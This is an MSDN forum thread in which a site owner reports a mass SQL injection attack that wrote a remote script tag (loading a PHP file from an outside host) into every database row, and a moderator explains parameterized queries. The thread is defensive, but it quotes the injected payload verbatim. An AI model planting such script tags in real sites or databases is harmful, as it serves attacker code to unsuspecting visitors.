Home Biblioteca Aprender Galeria Downloads Suporte Comunidade Fóruns
Microsoft Developer Network >
Security Issue - script being inserted in database

Respondido Security Issue - script being inserted in database

  • sexta-feira, 17 de agosto de 2012 23:35
     
     
    Entrar para Votar
    0

    Hello everyone,

    I am having a serious issue with our sql database.
    We have SQL Server Express 2005 running a Windows 2003 Web Edition virtual machine.
    We have a classic ASP website that uses this database and runs in the same server.

    Our database is being constantly attacked, updating all rows with values like "<script src="http://ecall09edytu.rr.nu/sl.php?v=2"></script>"

    I don't know how they are getting access to do this.

    I have changed all passwords, limited the access to the server (ftp and remote desktop) to only my personal ip, disabled remote access to sql server...

    Any ideas?

    Anything you can think of will be greatly appreciated.

    Thank you very much,

    Juan

     

Todas as Respostas

  • sábado, 18 de agosto de 2012 02:47
    Moderador
     
     Respondido
    Entrar para Votar
    0

    This looks like a combination of SQL injection and cross-site scripting. The cause of SQL injection is failure to use parameterized queries in application code. If one builds SQL statement strings by concatenating user input, a malicious user can manipulate the SQL statement so that other than the one intended is executed.

     

    Dan Guzman, SQL Server MVP, http://weblogs.sqlteam.com/dang/

     
© 2013 Microsoft. Todos os direitos reservados.
|
Comentários sobre o site